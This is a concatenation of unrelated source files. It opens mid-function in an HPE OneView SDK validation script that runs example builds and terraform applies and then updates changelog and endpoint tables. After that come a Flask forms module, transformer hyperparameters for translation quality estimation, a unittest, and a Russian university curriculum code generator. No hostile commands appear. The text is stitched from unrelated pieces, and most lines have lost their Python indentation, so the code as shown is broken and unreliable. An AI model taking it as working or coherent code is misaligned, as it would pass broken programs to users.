output, errors = p.communicate()
if errors is None:
success_files.append(example)
else:
failed_files.append(example)
elif val == 'go':
value_updated = input(
"\nPlease provide \"true\" as input if below mentioned example have varaiable updated with described values as below else provide \"false\" as input to terminate\n\nexamples/server_certificate.go\n\tserver_certificate_ip\t= \"172.18.11.11\"\nexamples/hypervisor_managers.go\n\thypervisor_manager_ip\t= \"172.18.13.11\"//\"<hypervisor_manager_ip>\"\n\tusername\t= \"dcs\" //\"<hypervisor_user_name>\"\n\tpassword\t= \"dcs\" //\"<hypervisor_password>\"\nexamples/storage_systems.go\n\tusername\t=\"dcs\"\n\tpassword\t=\"dcs\"\n\thost_ip \t=\"172.18.11.11\"\n\thost2_ip\t=\"172.18.11.12\"\n>>")
if value_updated.lower() == 'false':
sys.exit()
example_file_with_extension = example_file + str('.go')
cmd = "go run {}".format(example_file_with_extension)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p.wait()
contents = p.stdout.read()
print(contents)
output, errors = p.communicate()
if errors is None:
success_files.append(example)
else:
failed_files.append(example)
elif val == 'terraform':
''' value_updated = input("\nPlease provide \"true\" as input if below mentioned example have varaiable updated with described values as below else provide \"false\" as input to terminate\n\nexamples/server_certificate.go\n\tserver_certificate_ip\t= \"172.18.11.11\"\nexamples/hypervisor_managers.go\n\thypervisor_manager_ip\t= \"172.18.13.11\"//\"<hypervisor_manager_ip>\"\n\tusername\t= \"dcs\" //\"<hypervisor_user_name>\"\n\tpassword\t= \"dcs\" //\"<hypervisor_password>\"\nexamples/storage_systems.go\n\tusername\t=\"dcs\"\n\tpassword\t=\"dcs\"\n\thost_ip \t=\"172.18.11.11\"\n\thost2_ip\t=\"172.18.11.12\"\n>>")
if value_updated.lower() == 'false':
sys.exit()'''
build_cmd = "go build -o terraform-provider-oneview"
moving_binary_cmd1 = "mkdir -p ~/.terraform.d/plugins/"
moving_binary_cmd2 = "mv terraform-provider-oneview ~/.terraform.d/plugins/"
build = subprocess.Popen(build_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
build.wait()
if build.poll() == 0:
build = subprocess.Popen(moving_binary_cmd1, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
shell=True)
build = subprocess.Popen(moving_binary_cmd2, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
shell=True)
build_output, build_errors = build.communicate()
if build_errors:
print(build_errors)
sys.exit()
example_loc = cwd + '/examples/' + example + '/'
init_cmd = "terraform init"
init_p = subprocess.Popen(init_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
print("running terraform init")
init_p.wait()
for i in range(3):
if i == 0:
copy = "cp " + example_loc + "main.tf " + cwd
copy_p = subprocess.Popen(copy, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
_, copy_errors = copy_p.communicate()
if copy_errors is None:
plan_cmd = "terraform plan"
print("executing main.tf plan: ", example)
plan_p = subprocess.Popen(plan_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
shell=True)
plan_p.wait()
if plan_p.poll() == 0:
_, plan_errors = plan_p.communicate()
if plan_errors is None:
apply_cmd = "terraform apply --auto-approve"
print("executing main.tf apply: ", example)
apply_p = subprocess.Popen(apply_cmd, stdout=subprocess.PIPE,
stdin=subprocess.PIPE, shell=True)
_, apply_errors = apply_p.communicate()
apply_p.wait()
os.remove(cwd + "/main.tf")
if apply_errors != None:
failed_files.append(example + " main.tf")
else:
success_files.append(example + " main.tf")
else:
os.remove(cwd + "/main.tf")
failed_files.append(example + " main.tf")
else:
os.remove(cwd + "/main.tf")
failed_files.append(example + " main.tf plan_p.poll is != 0, ")
else:
failed_files.append(example + " failed to copy main file, ")
elif i == 1:
copy = "cp " + example_loc + "update_resource.tf " + cwd
copy_p = subprocess.Popen(copy, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
_, copy_errors = copy_p.communicate()
if copy_errors is None:
print("executing update_resource.tf plan: ", example)
plan_cmd = "terraform plan"
plan_p = subprocess.Popen(plan_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
shell=True)
plan_p.wait()
if plan_p.poll() == 0:
_, plan_errors = plan_p.communicate()
if plan_errors is None:
print("executing update_resource.tf apply: ", example)
apply_cmd = "terraform apply --auto-approve"
apply_p = subprocess.Popen(apply_cmd, stdout=subprocess.PIPE,
stdin=subprocess.PIPE, shell=True)
apply_p.wait()
_, apply_errors = apply_p.communicate()
os.remove(cwd + "/update_resource.tf")
if apply_errors != None:
failed_files.append(example + " update_resource.tf")
else:
success_files.append(example + " update_resource.tf")
else:
os.remove(cwd + "/update_resource.tf")
failed_files.append(example + " update_resource.tf")
else:
os.remove(cwd + "/update_resource.tf")
failed_files.append(example + " update_resource.tf the plan_p.poll is != 0, ")
else:
failed_files.append(example + " failed to copy update_resource file, ")
else:
copy = "cp " + example_loc + "data_source.tf " + cwd
copy_p = subprocess.Popen(copy, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
_, copy_errors = copy_p.communicate()
if copy_errors is None:
print("executing data_source.tf plan: ", example)
plan_cmd = "terraform plan"
plan_p = subprocess.Popen(plan_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
shell=True)
plan_p.wait()
if plan_p.poll() == 0:
_, plan_errors = plan_p.communicate()
if plan_errors is None:
print("executing data_source.tf apply: ", example)
apply_cmd = "terraform apply --auto-approve"
apply_p = subprocess.Popen(apply_cmd, stdout=subprocess.PIPE,
stdin=subprocess.PIPE, shell=True)
apply_p.wait()
_, apply_errors = apply_p.communicate()
os.remove(cwd + "/data_source.tf")
if apply_errors != None:
failed_files.append(example + " data_source.tf")
else:
success_files.append(example + " data_source.tf")
else:
os.remove(cwd + "/data_source.tf")
failed_files.append(example + " data_source.tf")
else:
os.remove(cwd + "/data_source.tf")
failed_files.append(example + " data_source.tf the plan_p.poll is != 0, ")
else:
failed_files.append(example + " failed to copy data_source file ")
'''contents = p.stdout.read()
print(contents)
output, errors = p.communicate()
if errors is None:
success_files.append(example)
else:
failed_files.append(example)'''
elif val == 'puppet' and example not in ['tasks', 'scopes', 'interconnect_types']:
example_file_with_extension = example_file[:-1] + str('.pp')
cmd = "puppet apply --modulepath={}".format(example_file_with_extension)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p.wait()
contents = p.stdout.read()
print(contents)
output, errors = p.communicate()
if errors is None:
success_files.append(example)
else:
failed_files.append(example)
elif val == 'chef' and example not in ['tasks', 'scopes', 'interconnect_types']:
example_file_with_extension = example_file[:-1] + str('.rb')
cmd = "chef client -z -o oneview::{}".format(example)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p.wait()
contents = p.stdout.read()
print(contents)
output, errors = p.communicate()
if errors is None:
success_files.append(example)
else:
failed_files.append(example)
else:
pass
except Exception as e:
print("Failed to execute {} with exception {}".format(str(example), (str(e))))
failed_files.append(example)
        sys.stdout = original
        print("success files are {}".format(str(success_files)))
        f.close()
        return success_files, is_ansible, val
else:
print("Sorry, please enter the valid SDK among the following {}".format(str(valid_sdks)))
class WriteToChangeLog(object):
"""
    Here we have exception handling. In case any of the values for a key is not present,
    it will raise an exception and we catch it. The script will continue and
    add the modules other than the missing one.
Output will look like:
##### Features supported with the current release(v5.0.0)
- FC Network
- FCOE-Network
:param rel_list:
:param rel_version:
:return:
"""
def __init__(self, rel_list, sdk):
self.rel_list = rel_list
self.sdk = sdk
if self.sdk == 'ruby':
path_parent = os.path.dirname(os.getcwd())
os.chdir(path_parent)
path_parent = os.path.dirname(os.getcwd())
os.chdir(path_parent)
print(os.getcwd())
f = open("CHANGELOG.md", "r")
first_line = f.readline()
file_name = 'CHANGELOG.md'
list_of_linenos = self.search_string_in_file(first_line, file_name)
        if list_of_linenos is not None and len(list_of_linenos) != 0:
self.delete_multiple_lines(file_name, list_of_linenos)
self.added_integer = float(first_line[2:5])
else:
self.added_integer = float(first_line[2:5]) + float('0.1')
self.final_version = str(self.added_integer) + '.0'
f.close()
def delete_multiple_lines(self, file_name, linenos):
start = int(linenos[0])
end = int(linenos[1])
count = end - start
for line in fileinput.input(file_name, inplace=1, backup='.orig'):
if start <= fileinput.lineno() < start + count:
pass
else:
print(line[:-1])
fileinput.close()
def search_string_in_file(self, first_line, file_name):
line_number = 0
count = 0
list_of_results = []
if (first_line[8:18] == 'unreleased' or first_line[8:18] == 'Unreleased'):
with open(file_name, 'r') as read_obj:
for line in read_obj:
if count == 2:
break
else:
line_number += 1
if re.search("^#\s([0-9][.]*){2}", line):
list_of_results.append(line_number)
count += 1
return list_of_results
def write_data(self):
rel_modules = []
oneview_api_version = 'OneView ' + 'v' + str(self.added_integer)
try:
for ele in self.rel_list:
rel_modules.append(list(rel_dict.keys())[list(rel_dict.values()).index(ele)])
print(str(rel_modules))
except Exception as e:
logging.debug("Unable to find a module {0}".format(str(e)))
print("Started writing to CHANGELOG")
try:
dummy_file = open("dummy_CHANGELOG.md", "w")
dummy_file.write("# {}(unreleased)".format(str(self.final_version)))
dummy_file.write("\n#### Notes\n")
dummy_file.write("Extends support of the SDK to OneView REST API version {} ({})".format(str(api_version),
str(
oneview_api_version)))
dummy_file.write("\n\n##### Features supported with the current release\n")
for ele in sorted(rel_modules):
dummy_file.write("- {0} \n".format(str(ele)))
dummy_file.write("\n")
dummy_file.close()
original_file = open("CHANGELOG.md", "r")
data = original_file.read()
original_file.close()
dummy_file = open("dummy_CHANGELOG.md", "r")
data2 = dummy_file.read()
dummy_file.close()
data2 += data
with open("CHANGELOG.md", "w") as final:
final.write(data2)
final.close()
os.remove("dummy_CHANGELOG.md")
print("Completed writing to CHANGELOG")
except Exception as e:
print("Exception occurred while writing to CHANGELOG {0}".format(str(e)))
resource_names = []
class WriteToEndpointsFile(object):
def __init__(self, product_table_name, executed_files, is_ansible, sdk):
self.line_nos = {}
self.res_lines = {}
self.product_table_name = product_table_name
self.all_lines = None
self.executed_files = executed_files
self.is_ansible = is_ansible
self.current_version = None
self.sdk = sdk
def write_md(self):
file = open('endpoints-support.md', 'w')
file.writelines(self.all_lines)
file.close()
def load_md(self):
file = open('endpoints-support.md')
self.all_lines = file.readlines()
def add_column(self, product_table_name):
count = 0
self.load_md()
for line in self.all_lines:
count += 1
if product_table_name in line:
break
head_line = self.all_lines[count + 1].split()
self.current_version = int(head_line[-2].split('V')[-1])
new_version = 'V' + str(self.current_version + 200)
if int(api_version) == self.current_version:
return
column_added = False
while count < len(self.all_lines):
add_col = None
line = self.all_lines[count].rstrip('\n')
if "Endpoints" in self.all_lines[count]:
add_col = line + " " + new_version + ' |\n'
elif "---------" in self.all_lines[count]:
add_col = line + ' :-----------------: |\n'
column_added = True
if add_col:
self.all_lines[count] = add_col
self.write_md()
if column_added:
break
count += 1
def get_rows(self, resource_name):
count = 0
resource_name_row_start = 0
resource_name_row_end = 0
self.load_md()
for line in self.all_lines:
count += 1
if line.startswith('| ' + resource_name):
resource_name_row_start = count
for no in range(count, len(self.all_lines)):
if self.all_lines[no].startswith('| **'):
resource_name_row_end = no
break
return resource_name_row_start, resource_name_row_end
def get_lines(self, st_no, end_no):
lines = list()
self.load_md()
for no in range(st_no, end_no):
lines.append(dict({'line_no': no, 'line': self.all_lines[no]}))
return lines
def get_old_end_points(self, st_no, end_no, webscraping_data):
lines = self.get_lines(st_no, end_no)
end_points_list = []
old_end_points = []
for ele in lines:
line = ele.get('line')
if line.startswith('|<sub>'):
ln = line.split('|')
split_module = ln[1].strip().split('<sub>')
module = split_module[-1].split('</sub>')[0]
end_points_list.append({module, ''.join((ln[2].split()))})
for end_point in end_points_list:
data_found = False
for data in webscraping_data:
if data == end_point:
data_found = True
break
if not data_found:
old_end_points.append(end_point)
return old_end_points
def validate_webscrapping_data(self, lines, end_point, str):
self.current_version = int(api_version) - 200
end_point_found = False
for ele in lines:
line_no = ele.get('line_no')
line = ele.get('line')
if line.startswith('|<sub>'):
ln = line.split('|')
ln_length = len(ln)
desired_length = int(((((self.current_version + 200) - 800) / 200) + 3))
split_module = ln[1].strip().split('<sub>')
module = split_module[-1].split('</sub>')[0]
if end_point == {module, ln[2].strip()}:
ln = line.rstrip('\n')
if (ln_length == desired_length):
add_col = ln + str
self.all_lines[line_no] = add_col
else:
pass
end_point_found = True
break
if not end_point_found:
return end_point
return
def add_checks(self, st_no, end_no, webscraping_data):
lines = self.get_lines(st_no, end_no)
old_end_points = self.get_old_end_points(st_no, end_no, webscraping_data)
for old_end_point in old_end_points:
self.validate_webscrapping_data(lines, old_end_point, ' :heavy_minus_sign: |\n')
new_end_points = []
for end_point in webscraping_data:
new_end_point = self.validate_webscrapping_data(lines, end_point, ' :white_check_mark: |\n')
if new_end_point:
new_end_points.append(new_end_point)
        # the code below would add new endpoints into the endpoints-support.md file; it's commented out and parked aside
# for end_point in new_end_points:
# if (len(list(end_point)[1]) > 5):
# add_col = '|<sub>'+list(end_point)[1]+'</sub> |'+' '+list(end_point)[0]+' '+ '| :heavy_minus_sign: '*int(((((self.current_version+200)-800)/200)-1))+'| :white_check_mark: |\n'
# else:
# add_col = '|<sub>'+list(end_point)[0]+'</sub> |'+' '+list(end_point)[1]+' '+ '| :heavy_minus_sign: '*int(((((self.current_version+200)-800)/200)-1))+'| :white_check_mark: |\n'
# line_no = lines[-1].get('line_no')
# self.all_lines[line_no] = self.all_lines[line_no]+add_col
# self.write_md()
# self.load_md()
# lines.append(dict({'line_no':line_no+1, 'line':self.all_lines[line_no+1]}))
def main(self):
i = 0
if self.is_ansible == True:
exe = modifyExecutedFiles(self.executed_files)
self.executed_files = exe
else:
pass
print("------Initiating write to endpoints file--------")
for ele in self.executed_files:
resource = list(rel_dict.keys())[list(rel_dict.values()).index(ele)]
formatted_resource_name = '**' + resource + '**'
resource_names.append(formatted_resource_name)
self.add_column(self.product_table_name)
for resource_name in resource_names:
webscraping_data = DataFromWebScraping(self.executed_files[i])
data_returned_from_web_scraping = webscraping_data.data_scraped()
st_no, end_no = self.get_rows(resource_name)
self.add_checks(st_no, end_no, data_returned_from_web_scraping)
i = i + 1
self.write_md()
print("-------Completed write to endpoints file--------")
def removeLogFiles(val):
    if val.lower() == 'true':
        print("Please check the working directory for the log files")
else:
print("---------Removing all log files---------------")
cwd = os.getcwd()
for rootDir, subdirs, filenames in os.walk(cwd):
for filename in fnmatch.filter(filenames, 'logfile*.log'):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
print("Error while deleting file")
print("---------Completed removing log files--------------")
if __name__ == '__main__':
    selected_sdk = input("Please enter SDK you want to validate(python, ansible, ruby, go, puppet, chef, terraform): ")
executed_files, is_ansible, sdk = ExecuteFiles(selected_sdk)
resources_from_textfile = LoadResourcesFromFile()
    val4 = input('Please provide value as true to retain log files, else provide false: ')
    if val4.lower() == 'false':
removeLogFiles(val4)
else:
pass
val1 = input("Do you want to write data to CHANGELOG.md: ")
if val1 in ['y', 'yes', '']:
if len(executed_files) != len(resources_from_textfile):
val3 = input("There are few failed resources, even then do you want to write data to CHANGELOG.md: ")
if val3 in ['y', 'yes', '']:
write_obj = WriteToChangeLog(executed_files, sdk)
write_obj.write_data()
else:
print(
"Please check failed_resources list and procees with writing to CHANGELOG with successfully executed files")
else:
print("Started writing to CHANGELOG.md")
write_obj = WriteToChangeLog(executed_files, sdk)
write_obj.write_data()
print("Completed writing to CHANGELOG.md")
else:
print("Please proceed with writing to endpoints file")
val2 = input("Do you want to edit endpoints-support.md: ")
if val2 in ['y', 'yes', '']:
read_md_obj = WriteToEndpointsFile('## HPE OneView', executed_files, is_ansible, sdk)
read_md_obj.main()
else:
print("Please proceed with editing endpoints file") |
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed
from wtforms import StringField, PasswordField, BooleanField, SubmitField, TextAreaField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, Length
from app.models import User
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember Me')
submit = SubmitField('Sign In')
class PostForm(FlaskForm):
title = StringField('Enter Post Title:', validators=[DataRequired()])
post = TextAreaField('Enter Post Body:', validators=[DataRequired()])
upload = FileField('Upload Image:', validators=[FileAllowed(['jpg'], "Must be .jpg")])
submit = SubmitField('Submit')
class EditForm(FlaskForm):
title = StringField('Post Title:', validators=[DataRequired()])
post = TextAreaField('Post Body:', validators=[DataRequired()])
submit = SubmitField('Submit')
|
# -*- coding: utf-8 -*-
#!/usr/bin/python3
'''
June 2017 by kyubyong park.
[email protected].
https://www.github.com/kyubyong/transformer
maxlen = 70, batch_size = 128
Source, target, and projection (proj) vocabularies are shared ??? qe-brain does not share them
Optimization strategy: already changed to be the same as in qe-brain
'''
class QE_Hyperparams:
'''Hyperparameters'''
# data
source_train = '../parallel_data/2017/qe_data/sentence_level_en_de/train.tok.lower.src'
target_train = '../parallel_data/2017/qe_data/sentence_level_en_de/train.tok.lower.mt'
label_train = '../parallel_data/2017/qe_data/sentence_level_en_de/train.hter'
source_dev = '../parallel_data/2017/qe_data/sentence_level_en_de/dev.tok.lower.src'
target_dev = '../parallel_data/2017/qe_data/sentence_level_en_de/dev.tok.lower.mt'
label_dev = '../parallel_data/2017/qe_data/sentence_level_en_de/dev.hter'
source_test = '../parallel_data/2017/qe_data/sentence_level_en_de_test/test.2017.tok.lower.src'
target_test = '../parallel_data/2017/qe_data/sentence_level_en_de_test/test.2017.tok.lower.mt'
label_test = '../parallel_data/2017/qe_data/sentence_level_en_de_test/en-de_task1_test.2017.hter'
vocab_dir = './preprocessed_qe/'
pattern = 'en-de'
# training
batch_size = 64 # alias = N
lr = 2.0 # learning rate. learning rate is adjusted to the global step.
warmup_steps = 8000
    log_dir = 'logdir'  # log directory, where the expert model is saved
num_keep_ckpts = 5
# model
maxlen = 70+2 # Maximum number of words in a sentence. alias = T.
# Feel free to increase this if you are ambitious.
    # min_cnt = 20  # words that occur less than min_cnt times are encoded as <UNK>.
vocab_size = 30000 # src and tgt
hidden_units = 512 # alias = C
num_blocks = 2 # number of encoder/decoder blocks
num_heads = 8
dropout_rate = 0.1
sinusoid = True # If True, use sinusoid. If false, positional embedding.
# qe params
model_dir = './modeldir/' # dir of qe_model
num_train_steps = 75000
steps_per_stats = 10 # Once in a while, we print statistics.
steps_per_save = 50
fixed_exp = False # fixed expert weights or not
patience = 5
|
""" conf test cases """
import unittest
from xcmd.conf import Conf, ConfVar
class ConfTestCase(unittest.TestCase):
""" test conf code """
def setUp(self):
""" nothing for now """
pass
def test_conf(self):
""" basic tests """
conf = Conf(
ConfVar(
'foo',
'A foo variable',
10
),
ConfVar(
'bar',
'A bar variable',
'some value'
)
)
self.assertEqual(conf.get_int('foo'), 10)
self.assertEqual(conf.get_str('bar'), 'some value')
self.assertEqual(len(list(conf.get_all())), 2)
|
import pandas as pd
import numpy as np
import re
import time
import sys
degree = {
"06": ["Академический бакалавр", "Специалист"],
"07": ["Магистр"]
}
uni_module = {
"0": "универсальный модуль",
"1": "модуль философия мышление",
"2": "модуль цифровая культура",
"3": "модуль креативные технологии",
"4": "модуль предпринимательская культура",
"5": "модуль soft skills",
"6": "огнп",
"7": "физическая культура",
"8": "цифровая культура в профессиональной деятельности",
"9": "общеуниверситетские дисциплины мировоззренческого модуля",
"10": "иностранный язык",
"11": "элективная дисциплина soft skills",
"12": "факультативные дисциплины"
}
ognp_module = {
"0": "математический модуль",
"1": "естественнонаучный модуль",
"2": "общепрофессиональный модуль",
"3": "элективный модуль по группе направлений",
"4": "межпрофильный модуль факультета",
"5": "профильный профессиональный модуль",
# "6": "специализац",
"7": "факультетский модуль",
"8": "цифровая культура в предметной области мегафакультета",
"9": "профессиональный модуль",
"10": "практики",
"11": "гиа"
}
ognp_codes = {
"1": ["12.03.04", "14.03.01", "16.03.03", "18.03.02", "19.03.01", "19.03.02", "19.03.03", "16.04.03", "18.04.02", "19.04.01", "19.04.02", "19.04.03", "20.04.01", "27.04.01"],
"2": ["12.03.01", "13.03.02", "15.03.04", "15.03.06", "24.03.02", "27.03.04", "11.04.03", "12.04.01", "13.04.02", "15.04.02", "15.04.04", "15.04.06", "23.04.03", "24.04.01", "24.04.02", "27.04.03"],
"3": ["09.03.01", "09.03.04", "10.03.01", "11.03.03", "23.03.03", "44.03.04", "09.04.01", "09.04.04", "10.04.01", "27.04.04"],
"4": ["27.03.05", "38.03.05", "27.04.02", "27.04.05", "27.04.08", "38.04.01", "38.04.05"],
"5": ["01.03.02", "09.03.02", "01.04.02", "02.04.03", "09.04.02"],
"6": ["09.03.03", "11.03.02", "45.03.04", "07.04.04", "09.04.03", "11.04.02", "27.04.07", "45.04.04"],
"7": ["12.03.02", "12.03.03", "12.03.05", "12.05.01", "16.03.01", "12.04.02", "12.04.03", "12.04.04", "12.04.05", "16.04.01"]
}
# remove multiple spaces and punctuation
def cleanText(text):
cleaned = re.sub(r'[^\w\s]', ' ', text)
cleaned = re.sub(' +', ' ', cleaned)
cleaned = cleaned.replace('\xa0', '')
cleaned = cleaned.replace('\t', '')
cleaned = cleaned.strip()
return cleaned
# calculate positions 1-3
def getPos123(xlsx_degree, xlsx_sf_code, xlsx_sf_name, xlsx_comp, line=""):
list_of_degrees = [d for d in degree if xlsx_degree in degree[d]]
if not list_of_degrees: sys.exit("Неизвестный уровень образования в %sзаписи." % line)
else: p1 = list_of_degrees[0]
uni = [u for u in uni_module if re.match(uni_module[u], xlsx_comp, flags=re.IGNORECASE)]
module = ["5" if re.match("модуль [0-9]", xlsx_comp, flags=re.IGNORECASE) else
"6" if re.search("специализац", xlsx_comp, flags=re.IGNORECASE) else
p if re.match(ognp_module[p], xlsx_comp, flags=re.IGNORECASE) else
np.nan for p in ognp_module]
module = [m for m in module if str(m) != 'nan']
if not uni and not module: sys.exit("Неизвестный модуль в %sзаписи." % line)
if uni: return p1 + "." + "0" + "." + uni[0] + "."
if module:
ognp_num = ["3" if xlsx_sf_name == "Цифровые системы управления" else
"2" if xlsx_sf_name == "Системы управления движением и навигации" else
"1" if xlsx_sf_name == "Цифровые геотехнологии" else
num if xlsx_sf_code in ognp_codes[num] else
np.nan for num in ognp_codes]
ognp_num = [p for p in ognp_num if str(p) != 'nan']
if not ognp_num:
print(xlsx_degree, xlsx_sf_code, xlsx_sf_name)
sys.exit("Неизвестный шифр направления подготовки в %sзаписи." % line)
else: return p1 + "." + ognp_num[0] + "." + module[0] + "."
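# Illustrative call (hypothetical subfield name; relies on the degree/uni_module/ognp dictionaries above):
#   getPos123("Магистр", "09.04.01", "Программная инженерия", "профессиональный модуль")
#   -> "07." (master's degree) + "3." ("09.04.01" belongs to ognp_codes group "3") + "9." (профессиональный модуль)
#   == "07.3.9."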
# find max 4th value
def getMax4(dis_rep):
list_of_4 = [int(dis_rep["DIS_CODE"][d].split(".")[3]) for d in dis_rep.index.values]
if list_of_4: return max(list_of_4)
else: return -1
def totalUnitInfo(data, sf_name, subj, comp, subj_code, cycle, year):
credit_units = [0 for i in range(0, 12)]
units = data.loc[(data["SUBFIELDNAME"] == sf_name) & (data["SUBJECT"] == subj) & (data["COMPONENT"] == comp) & (data["SUBJECT_CODE"] == subj_code) & (data["CYCLE"] == cycle) & (data["YEAR"] == year)]
try:
for u in units.index.values:
if pd.isna(units["CREDITS"][u]) or units["CREDITS"][u] == 0: credit_units[int(units["SEMESTER"][u]) - 1] = "-"
elif units["SEMESTER"][u] == ".": credit_units[11] = int(units["CREDITS"][u])
else: credit_units[int(units["SEMESTER"][u]) - 1] = int(units["CREDITS"][u])
except:
pass
return ",".join(map(str, credit_units))
def numUnitsCredits(units_credits):
units = [u for u in units_credits.split(",") if u != "0"]
int_creds = [0 if u == "-" else int(u) for u in units]
return ",".join(map(str, [len(units), sum(int_creds)]))
def getPos4(rep, sem_xlsx, dis_code, subj, sf_name):
if subj not in rep["SUBJECT"].to_list():
return str(getMax4(rep) + 1)
else:
rep1 = rep.loc[rep["SUBJECT"] == subj]
new_sem_info = rep1["SEM_INFO"].apply(numUnitsCredits).to_list()
rep3 = rep1.assign(UNITS_CREDITS=new_sem_info)
if numUnitsCredits(sem_xlsx) not in new_sem_info:
return str(getMax4(rep) + 1)
else:
rep2 = rep3.loc[rep3["UNITS_CREDITS"] == numUnitsCredits(sem_xlsx)].reset_index(drop=True)
rows = len(rep2["DIS_CODE"])
count = 0
for p in rep2.index.values:
if (rep2["SUBFIELDNAME"][p] != sf_name) and (dis_code.split(".")[2] in ["10", "11"]) and (dis_code.split(".")[1] != "0"):
count += 1
if count != rows: continue
else:
return str(getMax4(rep) + 1)
else:
return str(rep2["DIS_CODE"][p].split(".")[3])
# workaround for 01.04.02 Разработка программного обеспечения / Software Engineering
def softwareEngineering(rep, sem_xlsx, dis_code, subj):
p12 = dis_code[:-2]
p3 = dis_code.split(".")[2]
fin_rep = rep.loc[rep["DIS_CODE"].str.match(p12 + p3)]
if subj not in rep["SUBJECT"].to_list(): return p3 + "." + str(getMax4(fin_rep) + 1)
else:
rep1 = rep.loc[rep["SUBJECT"] == subj]
new_sem_info = rep1["SEM_INFO"].apply(numUnitsCredits).to_list()
rep2 = rep1.assign(UNITS_CREDITS=new_sem_info)
if numUnitsCredits(sem_xlsx) not in new_sem_info: return p3 + "." + str(getMax4(fin_rep) + 1)
else:
rep3 = rep2.loc[rep2["UNITS_CREDITS"] == numUnitsCredits(sem_xlsx)].reset_index(drop=True)
rep3["DIS_CODE"] = rep3.groupby(["SUBJECT", "UNITS_CREDITS"])["DIS_CODE"].transform("first")
return ".".join(rep3["DIS_CODE"][0].split(".")[-2:])
# workaround for элективный модуль по группе направлений
def electiveModuleBachelor(rep, sem_xlsx, dis_code, subj):
p23 = ".".join(dis_code.split(".")[1:])
fin_rep = rep.loc[rep["DIS_CODE"].str.match(dis_code)]
if subj not in rep["SUBJECT"].to_list():
return p23 + str(getMax4(fin_rep) + 1)
else:
rep1 = rep.loc[rep["SUBJECT"] == subj]
new_sem_info = rep1["SEM_INFO"].apply(numUnitsCredits).to_list()
rep2 = rep1.assign(UNITS_CREDITS=new_sem_info)
if numUnitsCredits(sem_xlsx) not in new_sem_info:
return p23 + str(getMax4(fin_rep) + 1)
else:
rep3 = rep2.loc[rep2["UNITS_CREDITS"] == numUnitsCredits(sem_xlsx)].reset_index(drop=True)
rep3["DIS_CODE"] = rep3.groupby(["SUBJECT", "UNITS_CREDITS"])["DIS_CODE"].transform("first")
return ".".join(rep3["DIS_CODE"][0].split(".")[1:])
def getPos5(data, new_sys_df):
if new_sys_df == 1:
data["VERSION"] = data.groupby(["DIS_CODE"])["VERSION"].transform("first")
if new_sys_df == 0:
data["VERSION"] = data.groupby(["DIS_CODE"])["VERSION"].transform("min")
return data
# create sys_df if empty or does not exist
def create_sys_df():
cols = ["SUBFIELDCODE", "SUBFIELDNAME", "YEAR", "DEGREE", "SUBJECT_CODE", "SUBJECT", "COMPONENT", "SEM_INFO", "DIS_CODE", "VERSION"]
sys_df = pd.DataFrame(columns=cols)
return sys_df
def append_sys_df(sys_df, sf_code, sf_name, year, subj_degree, subj_code, subj, comp, sem_info, dis_code, ver):
to_append = [sf_code, sf_name, year, subj_degree, subj_code, subj, comp, sem_info, dis_code, ver]
new_row = pd.Series(to_append, index=sys_df.columns)
sys_df = sys_df.append(new_row, ignore_index=True)
return sys_df
# generate unique code for each discipline in excel file
def generate_df_w_unique_code(in_df, sys_df=None):
in_df = in_df.sort_values(by=["YEAR", "SUBFIELDCODE", "SUBFIELDNAME"]).reset_index(drop=True)
out_df = in_df.copy()
if (sys_df is None) or sys_df.empty:
new_sys_df = 0
sys_df = create_sys_df()
else:
new_sys_df = 1
in_df["COMPONENT"] = in_df["COMPONENT"].apply(cleanText)
in_df["SUBJECT"] = in_df["SUBJECT"].apply(cleanText)
in_df["YEAR"] = in_df["YEAR"].apply(str)
sys_df["YEAR"] = sys_df["YEAR"].apply(str)
in_df["SEM_INFO"] = "default"
for i in in_df.index.values:
in_df.loc[i, "SEM_INFO"] = totalUnitInfo(in_df, in_df["SUBFIELDNAME"][i], in_df["SUBJECT"][i], in_df["COMPONENT"][i], in_df["SUBJECT_CODE"][i], in_df["CYCLE"][i], in_df["YEAR"][i])
in_df.loc[i, "DIS_CODE"] = getPos123(in_df["DEGREE"][i], in_df["SUBFIELDCODE"][i], in_df["SUBFIELDNAME"][i], in_df["COMPONENT"][i], str(i + 2) + " ")
if (in_df["SUBFIELDNAME"][i] == "Разработка программного обеспечения / Software Engineering") and (in_df["DIS_CODE"][i].split(".")[2] in ["5", "6"]):
p34 = softwareEngineering(sys_df.loc[sys_df["DIS_CODE"].str.match(in_df.loc[i, "DIS_CODE"][:-2])], in_df.loc[i, "SEM_INFO"], in_df["DIS_CODE"][i], in_df["SUBJECT"][i])
in_df.loc[i, "DIS_CODE"] = in_df["DIS_CODE"][i][:-2] + str(p34)
elif (in_df["DIS_CODE"][i].split(".")[0] == "06") and (in_df["DIS_CODE"][i].split(".")[1] != "0") and (in_df["DIS_CODE"][i].split(".")[2] == "3"):
p234 = electiveModuleBachelor(sys_df.loc[sys_df["DIS_CODE"].str.match("06\.[1-7]\.3\.")], in_df.loc[i, "SEM_INFO"], in_df["DIS_CODE"][i], in_df["SUBJECT"][i])
in_df.loc[i, "DIS_CODE"] = in_df["DIS_CODE"][i][:3] + str(p234)
else:
p4 = getPos4(sys_df.loc[sys_df["DIS_CODE"].str.match(in_df.loc[i, "DIS_CODE"])],
in_df.loc[i, "SEM_INFO"], in_df["DIS_CODE"][i], in_df["SUBJECT"][i],
in_df["SUBFIELDNAME"][i])
in_df.loc[i, "DIS_CODE"] = in_df["DIS_CODE"][i] + str(p4)
